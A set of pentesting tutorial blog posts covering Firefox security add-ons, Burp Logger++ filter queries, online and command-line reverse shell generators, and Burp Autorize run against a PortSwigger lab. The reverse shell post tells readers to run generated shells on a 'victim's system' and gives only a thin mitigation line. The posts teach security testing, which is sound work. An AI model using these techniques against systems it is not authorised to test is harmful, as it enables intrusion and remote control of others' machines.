Firefox Addons for Pentesting

0
0

 Firefox Addons for Pentesting

In this article, we will learn how to customise the Firefox browser for efficient pen-testing along with extensions you can use for the same purpose.

Table of contents:

·       Introduction

·       Understanding the Role of the Browser in Penetration Testing

·       Extensions for efficient pen-testing

·       Wappalyzer

·       Foxyproxy

·       Hacktool

·       Hackbar

·       Tamper data

·       User-agent Switcher

·       Cookie editor

·       Temp mail

·       Built with

·       Conclusion

·       Mindmap

 

Introduction

In the ever-evolving landscape of cybersecurity, penetration testing stands as a crucial pillar of defence against the relentless onslaught of cyber threats. Penetration testers, often referred to as ethical hackers, play a pivotal role in identifying vulnerabilities and weaknesses within computer systems and applications. They simulate real-world attacks to uncover security flaws that malicious actors could exploit. One of the essential tools in a penetration tester's arsenal is their web browser, and customizing it for this purpose is of paramount importance. This article delves into why browser customization is vital for penetration testing and outlines the best practices for doing so.

 

Understanding the Role of the Browser in Penetration Testing

Before diving into the specifics of browser customization, it's essential to grasp the significance of the web browser in the realm of penetration testing. A web browser is more than just a tool for browsing websites; it is a versatile interface through which testers interact with web applications, inspect and manipulate data, and uncover vulnerabilities. Here's why browser customization matters in this context:

 

·       Control and Intercept Traffic: Customizing your browser allows you to exert fine-grained control over the HTTP traffic between your machine and web servers. Penetration testers need to intercept and analyse this traffic to identify vulnerabilities, such as injection attacks (e.g., SQL injection or Cross-Site Scripting), security misconfigurations, or sensitive data exposure. Customization facilitates the interception of requests and responses for in-depth analysis.

 

·       Seamless Integration with Tools: Leading penetration testing tools like Burp Suite and OWASP ZAP act as proxies that intercept, modify, and inspect HTTP traffic. Customizing your browser is essential to ensure that all web traffic flows through these tools, enabling a seamless integration that simplifies the testing process. Without customization, the tools cannot effectively capture and analyse the data.

 

·       Mimic Real-World Scenarios: Web applications often respond differently based on various factors, such as user agents, cookies, and headers. By customizing your browser, you can mimic these real-world scenarios and assess how the application behaves under different conditions. This is critical for understanding how security controls and mechanisms react to various inputs.

 

·       Enhanced Efficiency: Efficiency is a core concern for penetration testers. Customizing your browser with the necessary extensions, configurations, and settings streamlines the testing process. It enables testers to perform tasks more efficiently, saving time and increasing overall productivity.

 

·       Reducing False Positives: False positives can be a significant concern during penetration testing. Customizing your browser to closely resemble real user behaviour reduces the chances of encountering false positives. This ensures that the vulnerabilities identified are more likely to be genuine security issues, allowing organizations to focus on addressing critical weaknesses.

 

·       Session Management: Web applications often rely on session management and authentication mechanisms. Customizing your browser with cookie editors and session management tools allows penetration testers to simulate different user sessions, test for session fixation, and assess the overall security of authentication processes.

 

·       Bypassing Security Controls: Web applications may implement security controls or obfuscation techniques that hinder testing efforts, such as client-side validation or anti-automation mechanisms. Customizing your browser can help you bypass or work around these controls, allowing testers to identify vulnerabilities that may remain hidden otherwise.

 

·       Script and Payload Testing: Penetration testers often need to test custom scripts and payloads for vulnerabilities like Cross-Site Scripting (XSS) or SQL Injection. Customized browser settings aid in injecting and executing these scripts, enabling thorough testing and validation of security issues.

 

·       Automation: Customized browsers can be integrated into automated testing frameworks, enabling the automation of repetitive tasks and vulnerability scanning. Automation is invaluable for large-scale assessments and continuous monitoring of web applications.

 

·       Personalized Testing Environment: Different penetration testers may have different preferences and methodologies. Browser customization allows each tester to tailor their environment to meet their specific needs, ensuring that they can conduct assessments effectively and efficiently.

 

Extensions for efficient pen-testing

When it comes to penetration testing, having the right browser extensions can significantly enhance your capabilities and efficiency. Here is a list of some of the best browser extensions for penetration testing:

 

Wappalyzer

While not strictly a penetration testing extension, Wappalyzer helps you identify the technologies and frameworks used by a website. This information can be valuable for understanding the attack surface and potential vulnerabilities. Once installed in Firefox, the Wappalyzer extension works quietly in the background. When you visit a website, it scans the site and then displays a small icon in the browser toolbar. Clicking on this icon reveals a wealth of information about the site's underlying technologies.

Wappalyzer can identify various aspects of a website, including the content management system (CMS), e-commerce platforms, web servers, programming languages, analytics tools, and more. This information can be invaluable for competitive analysis, SEO optimization, or understanding the security implications of the technologies in use. This extension doesn't interfere with a website's functionality; it simply provides you with useful metadata that can inform your decisions. This extension is especially beneficial for web developers who may want to examine the technologies used on websites for inspiration or troubleshooting.

Overall, Wappalyzer is a legitimate and widely used extension that promotes transparency and understanding in the online world, making it a valuable resource for web professionals and enthusiasts alike. You can install it in your browser from the following link:

https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search

 



 

FoxyProxy

FoxyProxy is a Firefox extension that empowers users to manage and optimize their proxy settings effortlessly. It's an invaluable tool for individuals seeking enhanced online privacy, security, and control over their internet browsing experience.

Once installed, FoxyProxy allows users to easily switch between multiple proxy servers, routing their internet traffic through different locations or configurations. This is particularly useful for circumventing geo-restrictions, accessing region-locked content, or maintaining anonymity by masking your IP address. It offers a user-friendly interface that lets you create profiles for various proxy configurations. You can define rules to determine when specific proxies should be used, based on website URLs, IP addresses, and other criteria. This level of granular control ensures that your internet activity remains secure and private.

Additionally, FoxyProxy supports both HTTP and SOCKS proxy protocols, making it compatible with a wide range of proxy servers. Whether you're a privacy-conscious user, a digital marketer conducting geo-targeting research, or a web developer testing different proxy setups, FoxyProxy is a versatile and powerful extension that simplifies proxy management within the Firefox browser. You can download FoxyProxy from the following link:

https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search



 

HackTool

HackTools is a web extension designed to assist in conducting web application penetration tests. It offers a comprehensive set of resources, including cheat sheets and various tools commonly used during tests, such as XSS payloads and reverse shells. With this extension, the need to search for payloads on various websites or within your local storage is eliminated. Most of the necessary tools are readily accessible with just a single click. HackTools can be conveniently accessed through the browser's DevTools section, either as a pop-up or within a dedicated tab, accessible with the F12 key.

 

You can download the extension with the following link:

https://addons.mozilla.org/en-US/firefox/addon/hacktools/

 



 

Hack bar

Hackbar is a free Firefox extension that proves invaluable for security researchers during web application and web server testing. It simplifies common tasks such as interacting with domains, subdomains, and URLs of the target, as well as modifying parameters in the browser's address bar and reloading websites. These actions, while essential, can be time-consuming. Hackbar is a freely available open-source tool accessible on GitHub. It serves as a valuable aid for evaluating the security of web applications and web servers. Security researchers often employ Hackbar for tasks such as checking cross-site scripting (XSS) and SQL injection vulnerabilities on websites. It facilitates the discovery of website subdomains. Hackbar is compatible with multiple operating systems, including Windows.

You can download hackbar from the following link:

https://addons.mozilla.org/en-US/firefox/addon/hackbartool/

 

 


Tamper Data

Tamper Data is a Firefox extension that plays a pivotal role in the realm of web security and development. It empowers users, particularly security professionals, ethical hackers, and developers, to inspect and modify data exchanged between their browser and web servers in real-time. With Tamper Data, users can intercept and view HTTP/HTTPS requests and responses, gaining granular control over the data flow. It acts as a proxy between the browser and the server, allowing you to scrutinize the headers, cookies, and parameters of each request. This level of insight is indispensable for identifying security vulnerabilities, debugging web applications, and optimizing performance.

Tamper Data is instrumental in various security assessments. Security experts use it to test for common web vulnerabilities like Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and SQL Injection. It enables them to observe how data is transmitted and processed, helping uncover potential weaknesses that could be exploited by malicious actors.

You can download Tamper data from the following link:

https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/



 

User Agent Switcher

The User-Agent Switcher is a valuable Firefox extension that grants users the ability to change their browser's user agent string, effectively disguising their browser identity when interacting with websites. It's a versatile tool with various practical applications. This extension proves exceptionally useful for web developers and testers. They can simulate different user agents to assess how websites respond to various browsers and devices. This helps ensure that web content is responsive and functions correctly for a diverse user base. By switching user agents, developers can catch and address compatibility issues early in the development process. Additionally, the User-Agent Switcher is handy for privacy-conscious individuals. They can use it to enhance online anonymity by altering their user agent string, making it more challenging for websites to track and profile them based on their browser information.

You can download the extension from the following link:

https://addons.mozilla.org/en-US/firefox/addon/uaswitcher/

 



 

Cookie Editor

Cookie Editor enables users to view, edit, delete, and add cookies for specific websites. This level of control is crucial for enhancing online privacy, as users can choose which cookies to retain and which to discard. It's an effective means of blocking unwanted tracking cookies while allowing essential cookies to function.

Furthermore, web developers and testers find Cookie Editor invaluable for debugging and testing web applications. They can manipulate cookies to simulate different user scenarios and assess how websites respond under various conditions. This helps identify and address potential issues related to cookie handling within web applications.

 

You can download this extension from the following link:

https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/



 

Temp Mail

A Temporary Email extension for Firefox is a handy tool for enhancing online privacy and reducing email-related clutter. This type of extension generates disposable email addresses, allowing users to receive emails without revealing their primary email addresses. Here are some key benefits and applications:

·       Privacy Protection: Temporary email addresses shield your primary email account from spam, phishing attempts, and potential data breaches. You can use these disposable addresses for online registrations, subscriptions, or any situation where you want to avoid sharing your personal email.

 

·       Reduced Inbox Clutter: Many online services send promotional emails or newsletters after registration. Using a temporary email address keeps such emails separate from your primary inbox, helping you stay organized.

 

·       Verification and Testing: Web developers and testers often use temporary email addresses for testing user registration and email verification processes in applications without using real email accounts.

 

·       Anonymous Sign-ups: When exploring new websites or platforms, you can sign up using a temporary email address to avoid revealing your identity until you're comfortable with the service.

 

·       Bypass Email Verification: In some cases, you can use a temporary email address to bypass email verification requirements, making it easier to access certain content or services.

 



 

Built With

 

BuiltWith operates seamlessly within Firefox, allowing users to quickly assess websites' underlying technologies with a simple click. It offers a wealth of information, including details about the Content Management System (CMS), web hosting, programming languages, analytics tools, and more. This data can be instrumental for competitive analysis, optimizing digital marketing strategies, or exploring potential business collaborations.

 

Web developers benefit from BuiltWith by gaining insights into the technologies used by websites, aiding in understanding best practices and industry trends. It can also be used for debugging purposes, helping developers identify compatibility issues or security vulnerabilities related to specific technologies.

 

You can download the extension from the following link:

https://addons.mozilla.org/en-US/firefox/addon/builtwith/




 

Conclusion

Customizing your web browser for penetration testing is an indispensable practice that empowers ethical hackers to identify and mitigate vulnerabilities in web applications effectively. The browser serves as the primary interface through which testers interact with web resources, analyse HTTP traffic, and manipulate data to uncover security flaws.

By customizing your browser, you gain control over traffic, seamlessly integrate with security tools, mimic real-world scenarios, enhance efficiency, reduce false positives, manage sessions, bypass security controls, and test scripts and payloads. Moreover, a personalized testing environment tailored to your needs ensures that you can conduct assessments with precision and accuracy.

To customize your browser effectively, select the right browser, install security-oriented extensions, configure proxy settings, manage SSL/TLS certificates, disable unnecessary features, secure your environment, stay informed about the latest vulnerabilities, and document your findings meticulously. Following these best practices enables penetration testers to maximize their impact in safeguarding the digital landscape against cyber threats, ultimately enhancing the security posture of organizations and individuals alike.

Mindmap

There are so many extensions/ addons for Firefox from which you can choose to be efficient in your testing process. All of such extensions are mentioned in the following mind map:



Burpsuite for Pentester: Logger++

0
0

 Burp Logger++: A Powerful Extension

 

In this article, we’ll learn about a powerful Burp Extension cool tool called "Burp Logger++". It is like a super detective for websites, always on the lookout for any hidden problems. It is an extra feature that you can add to Burp, which lots of web experts use to find issues on websites.

Suppose you are a web explorer, and you want to know everything about a website. Burp Logger++ is like your trusty notebook. It is super helpful because it has a magical filter. You can tell it what kind of information you are looking for, and it will only show you those things.

With Burp Logger++, you can also color-code things. Think of it like using different colors to highlight the most important parts of a picture. This helps you spot the important stuff quickly.

·       Setting Up & Navigating

·       Query-Based Filter

·       Filter Library

·       Regex-Based Filter

·       Export Data Feature

Setting Up & Navigating

You can download and install the extension from the BApp Store. Go to Extensions > Bapp Store. Here, search for Logger++ or simply scroll down.

Click on it, on the right side scroll down and install it.



After successfully installation, it will appear on the tool bar.

 


Navigating

There are a lot of options visible to you. First, let's explore the "Options" tab to discover what advanced settings are included in this extension?

 


Navigate to "Options" to see the various log filter options. It allows you to customize logging setting as per your preference.



Logger++ is running by default. Here are some others important setting:

         Log Filter: This feature lets you specifically choose the requests that you don't need to record for analysis, or you may turn it off when not in use.

         Log From: It enables you to capture data from the specific logs that you want to capture from.

         Import: You can import log data from CSV and OWASP ZAP reports with this function.

         Export: The log data can be exported for further analysis.

Depending on your preferences, you can use different configuration. We are sticking with the default settings for the time being.

Query-Based Filter

The View Log tab contains all the logs. Using this website "vulnweb" as an example, browse it and simply scan the entire site; all logs will show up here under the View Logs page.



Now, go to Signup. In order to capture the logs for credentials, enter the test login details.

Username: test

Password: test

then click on "Login".



Let’s update some more details to capture more requests for further analysis.



You can see that all requests have been captured here in View Logs.



Magical Filter

You can use filter to selectively view or manipulate HTTP requests and responses. These filters help you focus on specific aspects of the web traffic and are especially useful during security testing. The working is based on query string. It accepts a logical query and returns output based on them.

You have some advanced choices with the filter options:

         Entry: You can apply filters according to number, tool, tags, InScope, and other criteria.




         Request: It lets you filter just the request itself using many options such as header, body, URL, method, parameters, cookies, etc. As shown below:



         Response: It lets you filter just the response by using various options such as header, body, Inferred Type, Method, Parameters, cookies etc. As shown below:



Scenario 1: Let's suppose you just want to view HTTP POST requests from all logs. It is understood that HTTP POST parameters are in HTTP Request.

Go to Filter bar > right click > Select Request > Select Method

The method has been chosen and visible in filter bar.



Quary: Request.Method == “POST”

And hit enter. As result, Only HTTP POST Method requests appear.





Scenario 2: Taking another example, suppose we just want to view the requests which contains any username information from all logs.

Go to Filter bar > right click > Select Request > Select Body

Quary: Request.Body CONTAINS “uname”

As a result, the following request is highlighted:



Below are some useful queries which are helpful during penetration testing.

Some Useful Filter Queries

JSON Injection (Check for only one json request)

Response.InferredType == "json"

Injections Attack (Check for HTML, XML, JSON)

Response.InferredType IN ["json", "html", "xml"]

Disclosed Server Information

Response.header CONTAINS “Server:”

Exposed Sensitive File

Response.Body CONTAINS [“.git”, “.config”, “.zip”, “.swf”, “.doc”, “.pdf”, “.xlsx”, “.csv”, ]

Exposed Sensitive Path

Request.Path CONTAINS [“/git”, “/etc”, “/var”]

Request.Path MATCHES “/account*”

Sensitive Parameter in Query String

Request.Path CONTAINS [“id”, “username”, “password”, “role”, “IsAdmin”]

Sensitive Parameter in Request

Request.Body CONTAINS [“id”, “username”, “password”, “token”, “role”, “EnterpriseID”, “IsAdmin”]

Missing Robots.txt

Request.Path MATCHES “/robots.txt”

CORS Misconfiguration

Response.Header MATCHES “ Access-Control-Allow-Origin: *”

Check for CSRF Token

Request.Method == "POST" AND Request.Body CONTAINS "csrf"

URL Redirection

Request.Path CONTAINS [“redirect=”, “page=”, “url=”, “index.page=”]

 

Filter Library

We can use the saved or pre-configured filters from the library directly with the help of the Filter Library. When you start testing, you do not have to manually type or remember the query string of filter pattern.



Click on “Add Snippet”.  Here are two values that must be added.

         Alias: Put any Alias name for your query string.

         Snippet: Add query string here.

As you can see below, I have added a filter for

Request_Type:  Request.Method == “POST”



You no longer have to type repeatedly to find only POST requests. You can color-code this request so that the highlighted request stands out among all captured requests on the View Logs page.

Click on Use as Color LogFilter > Select Background Color > check Enable and save it.



All POST requests are now highlighted in "Dard-Red" on this page.



Similarly, you can save whole test scenarios in the Filter Library. There is two ways to call the saved filter:

Method 1: In Filter Library, click on Set as LogFilter.

 


It will directly run the query and the desire result will be displayed.



Method 2:  Use “#” with Alias name directly in filter bar. 



And hit enter. The equivalent outcome will appear as follows:



Regex-Based Filter

Burp Logger's regex filter is a powerful feature that helps web security professionals pinpoint specific data within the vast sea of information during security testing.

You need to specify the regular expression (regex) pattern. This pattern acts like a search query, telling Burp Logger++ what kind of data you want to capture. You can create regex expression pattern to find data as like Email Address, IP Address, Server-side error messages, Software version disclosed, Any API Key exposed etc.

Go to Logger++, click on Grep Values tab. Here, you can see more filters to limit the search criteria.

·       Search Response = It will perform search only in responses.

·       Search Request = It will perform search only in requests.

·       In Scope Only = If you added the target URL in Scope only then it will only search within the scoped target.

For the time being, choose to search through every request and response. Let’s take an example, if you want to find email addresses in web traffic, your regex pattern might look like

Regex: [\w\.-]+@[\w\.-]+.

Directly paste this expression under Regex bar and press enter.



Consequently, the /userinfo.php request — which includes the email mentioned above is displayed.

You have two ways: Manually search through the complete request/response or click on Unique Result. The results that match the regex expression will be displayed only in Unique Results.

 




Similarly, Let’s check for IP Address also,

Regex Exp: \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b



It is evident that a POST request is being sent through the IP address 10.10.1.10.

In the same way, you can check for other important information like if you want to find the web traffic contains any FTP, HTTP, WWW.

Regex: \b(ftp|www|http)[^\s]+

For reference, the following link includes helpful regex expression to find the disclosed server version within the error information.

https://github.com/lwierzbicki/RegexFinder/blob/main/burp.regex.tsv

 

Export Data Feature

Burp Logger's data export feature is a valuable tool for web security professionals. It allows you to save, analyze, and share the captured data efficiently, making it an essential tool for documenting findings, performing in-depth analysis, and collaborating with others in the field of web security.

Why Export Data Feature is Helpful?

·       Data Preservation: Exporting data from the Logger++ allows you to save a record of your testing session. This is essential for documentation and analysis.

·       External Analysis: By exporting data, you can use external tools or software to perform in-depth analysis, generate reports, or share findings with team members.

·       Archiving Evidence: It helps in preserving evidence of potential vulnerabilities or security issues discovered during testing, which is crucial for audits and compliance.

·       Collaboration: Exported data can be easily shared with colleagues or experts for collaborative analysis, making it an asset in team-based security testing.

·       Customization: Depending on the export format chosen, you can tailor the exported data to meet specific reporting or analysis requirements.

Supported Formats:

·       Base64 JSON Format: Base64-encoded data is often used to include binary data within a JSON structure.

·       JSON Format: JSON is a lightweight data-interchange format used for structured data.

·       CSV Format: CSV files are widely supported and can be opened in spreadsheet software like Microsoft Excel or Google Sheets.

·       HAR Format: HTTP Archive (HAR) format is used for capturing and storing the performance-related data. The HAR format contains detailed information about HTTP requests and responses.



For Example, suppose you want to export all POST requests for further analysis.

Select the associate requests > right click > choose Export entries as > Export as CSV

 


Now Select All > Choose Save > Enter the name and click on Ok.



Save the result to your system offline. You can examine the CSV file; it contains all of the values that you chose to save.

You may select the only required values to store based on your needs.



That’s All, Cheers!!!

Conclusion

People like Burp Logger++ because it makes their job easier. It is your smart friend who helps you find hidden treasures (or problems) on websites. With its filters and colorful highlights, has the superpowers for website exploration.

So, if you are a web detective, it is a tool that will make your job much more fun and efficient. Give it a try and see how it can help you on your web adventures!

 

Author: Megha is a Certified Security Professional with extensive experience. She is a passionate Researcher and Technical Writer at Hacking Articles. Contact here.


Easy way to Generate Reverse Shell

0
0

 Easy Way to Generate Reverse Shell

In this article, we will learn how to get a reverse in few easy steps. Usually, the problem when reverse shell commands is to remember its long and complicating syntax. But due to growing AI of our digital world, this problem tackled and dealt with. Let’s see how it is done through this article.

Table of Content

·       What is Reverse Shell?

·       Types of Reverse Shell

·       Working of Reverse Shell

·       Reverse Shell Generator – 1

·       Reverse Shell Generator – 2

·       Hack tool

·       Shellz

·       Mitigation

 

What is Reverse Shell?

 

A reverse shell is a technique used in computer security and hacking that allows an attacker to gain control over a system through an established network connection. Reverse shells can be used for various purposes, including unauthorized access, data theft, and further exploitation of the compromised system.

A reverse shell, however, works in the opposite direction.

 

Here's a basic explanation of how a reverse shell typically works:

 

Listener/Server Side: The attacker sets up a listener (command and control/C2 server) on a machine they control. This listener waits for incoming connections.

 

Victim/Client Side: The attacker somehow tricks the target system into connecting back to their machine. This could be through techniques like exploiting vulnerabilities, social engineering, or other means.

 

Connection Establishment: Once the connection is established, the attacker gains a command shell on the target system. This shell allows them to execute commands on the target machine as if they were physically present.

Command Execution: The attacker can then issue commands on the target system, navigate the file system, run programs, and essentially control the system remotely.

 

 

 

 

Types of Reverse Shell

 

Reverse shell payloads are typically used by attackers to establish a connection back to their system. These payloads can be part of various hacking tools and frameworks. Here are some common types of reverse shell payloads:

 

Netcat (nc): Netcat is a versatile networking utility that can be used to create a basic reverse shell. The attacker sets up a listener using Netcat, and the victim connects back to it, establishing a shell.

Bash (Linux): A simple reverse shell can be achieved using Bash, the command shell for Unix-based operating systems. The attacker might use a one-liner command to create a reverse shell.

Python: Python is a powerful scripting language, and attackers often use it to create reverse shells. They can write a short script that opens a network connection and redirects input/output to that connection.

PowerShell (Windows): On Windows systems, PowerShell is a command-line shell that supports scripting. Attackers might use PowerShell to create reverse shells for Windows-based targets.

PHP: PHP is a server-side scripting language, and attackers can craft PHP scripts to establish reverse shell connections. These scripts are often injected into vulnerable web applications.

Ruby: Similar to Python, Ruby is a scripting language that can be used to create reverse shell payloads. Attackers might use Ruby scripts to exploit vulnerabilities and gain control over a system.

Metasploit Framework: Metasploit is a penetration testing framework that includes a variety of tools for exploiting vulnerabilities. It provides pre-built reverse shell payloads for different scenarios and platforms.

Java: Java-based reverse shells can be created to exploit systems where Java is installed. Attackers can use Java sockets to establish a connection back to their server.

C and C++: Attackers may also write custom reverse shell code in lower-level languages like C and C++ to avoid detection by antivirus software and intrusion detection systems.

 

Working of Reverse Shells

 

A reverse shell operates by initiating a connection between the target machine and the attacker's machine. Typically, the target machine sends a connection request to the attacker's machine. The attacker's machine functions as a listener, awaiting commands from the attacker.

 




 

 Various Type Reverse Shell Generator

To Create a Reverse Shell, we need a reverse shell command and a listener command. And to generate that go to the following website:

 

Online Tool- Reverse Shell Generator -1

 

Once the www.revshells.com is loaded, give your Listerner IP <Attacker IP> address and Listener Port <Random Port>; as soon as you do this listener and reverse shell command will be generated as shown in the image below. Execute the reverse shell command on the victim’s system and run the listener on your attacking machine. Once you do this, you will have your reverse shell.



 

As you can see in the image below, there are various options of the listener you can create such as powercat, busybox nc, socat, etc. Here we have created a netcat listenser.  Even for the reverse shell we have options like bash, pearl, ruby, nc -c and many more.

From the image below you can also observe that you can create such reverse shell commands for all the operating systems such as Linux, Windows and Mac.

 


This Reverse Shell generator also provide us with the option to create Hoaxshell which is a powershell payload for windows. The same is shown in the image below:




Reverse Shell Generator – 2

This is an amazing Online reverse shell generator. To use this generator, go to the following website:

www.tex2e.github.io/reverse-shell-generator/index.html

Once you are on the website, click on the ‘RevShell’ from the menu bar. And then give your Local Host and Local Port as shown in the image below and then click on the ‘Submit’ button. After clicking on the submit button, you will have your listener. Simultaneously, it will also create multiple reverse shell commands for various Operating Systems as shown in the image below:



HackTool

HackTools is an all-in-one browser extension designed for Red Team web pentesters. It streamlines web application penetration tests by providing cheat sheets and an array of essential tools, including XSS payloads, reverse shells, and more. This extension eliminates the need to search for payloads on different websites or in your local storage, offering one-click access to most tools.

Download the Hacktool extension from the following link :

https://addons.mozilla.org/en-US/firefox/addon/hacktools/

 





Once the extension is downloaded, access it through the full screen option. From the side bar go to the Reverse Shell option and give you Local hot and Local Port along with the type of shell you want to create as shown in the image below. Once you do this, it will create various reverse shells for you to use as shown in the image below:

 

 


Through Hacktool, you can also create PHP Reverse shell by clicking on the second option on the side bar and give your Local host and Local Port. Now the extension will create various PHP reverse shell. You can simply download it and the run it on the victim’s system and have a reverse shell.



 

Shellz

Shellz is a third-party tool which has made creating reverse shells a piece of cake. To download and install Shellz use the following set of commands as shown in the image below:

git clone https://github.com/4ndr34s/shells

cd shells

./install.sh

 

 


Once the tool is up and running, it will ask you about the type of reverse shell you want to create. As we wanted to create a bash shell, we chose the option 3 as shown in the image below:



After choosing the type of shell you want to create, it will ask you for Local IP and Local Port. Now choose the type of your IP as shown in the image below:



After this, it will ask you to if you want to encode your shell. Choose whatever option you like as we did not want to encode our shell, we chose then option 1 just like it shown in the image below:

 



And finally, it will give you the reverse shell command that you can execute on you r victim’s system. Then it will ask you the type of listener you want to create. Here, we chose netcat listener by typing in number 1 as shown in the image below:



 

After this, you can tell the tool where you want your session which can be either same window or a new terminal window just like we have done it. Voila! You will have your session as shown in the image below:



To our knowledge, these were the best four easiest methods to create reverse shells. If you try and google reverse shell generator, it spat out multiple results which you can use too.



Just like shown in the image above, you can choose and try any method or website you like.

Mitigation

To defend against reverse shells, it's essential to implement strong security measures, including firewalls, intrusion detection systems, and regular software updates. Security professionals should monitor network traffic for suspicious activity and follow best practices for secure system administration. 



Burpsuite for Pentester: Autorize

0
0

In order to protect online assets, web application security testing is an essential element of safeguarding them. Burp Suite has been a leader in this area for many years and it's still being used by safety professionals as well as Ethical hackers. One of those extensions that stands out in the web security testing community is "Autorize", which comes with a wide variety of additional features to improve its capabilities. A powerful set of features that simplify the authentication and authorization testing process is available with this extension.

Autorize = Authenticate + Authorize

Authorization includes any method by which a system grants or revokes permission to access specific data or actions. Meanwhile, Authentication is a process by which an individual or system authenticates themselves as being who they claim to be.

·       Common vulnerabilities detected by Autorize

·       Understanding the Functionality

·       Installation and Setup

·       Navigation and Configuration options

·       Practical Demonstration of Autorize in Action

Common vulnerabilities detected by Autorize

It is primarily focused on identifying authorization-related vulnerabilities. It can help to identify some of the main types of vulnerabilities, such as:

·       Inadequate Role-Based Access Control (RBAC): It can uncover issues where user roles or permissions are not properly enforced, allowing users to access functionality or data they shouldn't have access to.

·       Broken Access Controls: It can identify instances where access controls are not correctly implemented, leading to unauthorized access to resources or actions.

·       Insecure Direct Object References (IDOR): It can find situations where attackers can manipulate input to access other users' data or perform actions they shouldn't be able to.

·       Forced Browsing: It can help identify cases where an attacker can navigate directly to restricted areas of the application by manipulating URLs.

·       Insufficient Authorization: It may detect situations where user roles or permissions are not properly enforced, allowing unauthorized actions to be performed.

·       Horizontal and Vertical Privilege Escalation: It can find vulnerabilities that enable attackers to escalate their privileges within the application, either by impersonating other users or gaining additional permissions.

·       Business Logic Flaws: Autorize may discover business logic vulnerabilities, where application workflows can be manipulated in unintended ways, potentially leading to unauthorized actions or data exposure.

Remember that the effectiveness of Autorize depends on how well it is configured and your tests are carried out.

Understanding the working of Autorize

Let’s understand how Autorize works. Suppose, for instance, a web application implements user-based roles and supports cookie-based authentication.

Normal User: has access to general functionality but is not allowed to access admin functions and database (read-only access).

Admin User: has access to all functionality (read/write access).

Capture the normal user cookies and add them to Authorize. Re-log in with the Admin user access all the admin functionality and update some data to the database.

What will Autorize be doing now? Autorize is capturing all requests and changing the administrator cookie with your normal user's cookies when you are browsing an application, then sending them to server. See the server response, if the server behaves in the same way as legitimate Admin (like 200 OK in response) and no errors have been detected. The request was highlighted as a Red Bypass! Another request shows as a Green Enforced!.

For every request sent to the server from a client, it will perform an automated test. With a large application, with over 30+ dynamic webpages, it's going to ease our work. There are a lot of URLs you need to test manually, so Autorize will do it for you.

Similarly, Autorize also detects an API endpoint problem in the same way. The authentication method must be checked for the API. Let's say an API uses a JWT token, you can control that by modifying its authorization header and identifying the authentication bypass issues with the APIs.

Installation and Setup

From the Bapp Store, you can download and install the extension. Select Bapp Store in Extensions. You can search for ‘Authorize’, or you can just look down. Click on it, scroll down to the right side.

The extension is built in Python, you will see that 'Jython' needs to be installed first.




Browse the below link and download ‘Jython Standalone’.

Refer this link: https://www.jython.org/download.html

After downloading go to Setting > Extension > on the right side under Python Environment browser the Jython file. This environment has been successfully set up for Jython.



Restart the Burp program and follow this path to install Authorize on BApp Store. You'll notice that the install button is highlighted. You can click on it and install it.



The Authorize tab will appear in the bar after successful installation.

Navigating and Configuration Options

There are two tabs under the Authorize section, the first one is Request/Response Viewers tab and the other one Configuration tab.

Request/Response Viewers: The Request/Response tab will display complete information about the particular request you capture within Authorize and choose. The manipulated request will be displayed under the Modified Request section, the Original Request tab will display the original/unmodified request, and the Unauthenticated request will display the unauth request.



Configuration: Under the configuration tab you will see Autorize is off by default, when you are ready to capture the request first put Autorize on. There are also some configurations for capturing a request and server status code. Depending on your preference, you can select it.

Here, under the Temporary header box; you need to put the normal user token/cookies/header value that you want to replace within the actual request i.e. if any application is using a JWT token for auth mechanism you need to put that value here.

Either you can manually add the auth value or below is the option to fetch it from the last request. If you want to add the cookies header from the last request – click on ‘Fetch Cookies header’ or If you want to add Authorization header – click on ‘Fetch Authorization header’.

Generally, the session cookies are under Cookies Header and the auth token comes under Authorization Header.



Once the session cookies are loaded, it is essential to instruct Authorize on which requests to intercept and establish the standard behavior for the application when dealing with unauthorized requests or those with insufficient permissions.

Commencing with the Enforcement Detector, input a characteristic of the application's response that can be anticipated when a user with limited privileges tries to perform an action they lack sufficient permissions. In my practice, I've found that utilizing the "Body (simple string): enforced message body contains" option is the simplest to set up and functions effectively. Choose the type and content that aligns with your specific needs and remember to click the "Add filter" button.



Moreover, it is necessary to understand that it automatically sets the default comparison to "And" when assessing multiple filters. Therefore, if the application generates distinct error messages, such as one for trying to read a file and another for attempting to access administrative features, you should create a filter for each scenario and switch the "And" to "Or."

Follow the same procedure for the Unauthenticated Detector

 


The interception filter will intercept “Scope items only” regardless of content and from those requests, it will ignore spider requests and URLs containing image extensions. You may select on your preference and click “Add filter” when type is selected.



This is another additional feature Match/Replace. You can select it from this site if you need to change any specific header or body parameter on the Autorize request. Suppose there is a parameter name 'u.name' on the request body, and it has to be replaced by an Admin EID i.e.:=”a.name”) for proper access circumvention. You can tell Autorize via adding here.  

 


 

You can select the type of requests that you want to see under the Table Filter bar,

·       bypassed!: the endpoint may be vulnerable to IDOR,

·       Is enforced!: endpoint seems to be protected but re-check once,

·       Enforcing!: against IDOR, the endpoint is clearly protected.




You can save and export the data for further analysis under the Save/Restore tab.

 


Practical Demonstration of Autorize in Action

Let's do a quick demonstration to understand in an easy way, to perform this practical we are going to use a pre-setup Port Swigger lab “Method-based access control can be circumvented”. Click on access the lab and browser the application.

This will show a Broken Access Control vulnerability with two users that have different role higher and lower privilege users. The same concept can be applied to same-level users.

 


First, we have to capture the cookies for low privileged user (normal user). We are using the default normal user credentials,

Wiener:peter

And logged into the application to capture session cookie.

 


 

Updated some more details.



You will see the below capture session cookie in to the login request. Now copy this cookie header.

 


Add this cookie header value to Autorize tab as shown below,

 


 

And keep Autorize on.

 


In order to, check the auth bypass now we have to log in with high privilege (admin user). Go to login page again and use admin credentials to log in,

Administrator:admin

 


After successfully logging in and browsing the all admin-only URLs. You can see under the Autorize tab some highlighted requests

The Authz. Status indicates which endpoints are accessible to wiener (normal user).

The Unauth. Status pertains to unauthorized users, effectively eliminating the cookie and all authorization headers. You can opt to disable this feature by deselecting the "Check unauthenticated" option in the Autorize configuration tab.

Red [Bypassed!] : endpoint could be vulnerable to access control/IDOR issues. 

Orange [Is enforced!] : endpoint seems to be protected but cross-check manually by replacing the cookies value. 

